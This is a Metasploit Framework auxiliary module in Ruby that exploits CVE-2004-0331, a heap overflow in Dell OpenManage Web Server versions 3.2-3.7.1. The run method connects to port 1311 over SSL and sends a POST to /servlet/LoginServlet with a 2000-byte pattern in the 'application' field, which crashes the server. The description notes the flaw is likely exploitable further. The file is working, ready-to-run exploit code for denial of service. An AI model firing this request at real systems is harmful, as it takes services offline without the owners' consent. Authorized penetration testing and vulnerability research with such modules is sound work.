##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell OpenManage POST Request Heap Overflow (win32)',
      'Description'    => %q{
        This module exploits a heap overflow in the Dell OpenManage
        Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
        exists due to a boundary error within the handling of POST requests,
        where the application input is set to an overly long file name.
        This module will crash the web server, however it is likely exploitable
        under certain conditions.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
          [ 'BID', '9750' ],
          [ 'OSVDB', '4077' ],
          [ 'CVE', '2004-0331' ],
        ],
      'DisclosureDate' => 'Feb 26 2004'))

    register_options(
      [
        Opt::RPORT(1311),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ],
    self.class)
  end

  def run
    connect

    foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)

    sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
    sploit << "Content-Length: #{foo.length}\r\n\r\n"
    sploit << foo

    sock.put(sploit +"\r\n\r\n")

    disconnect
  end

end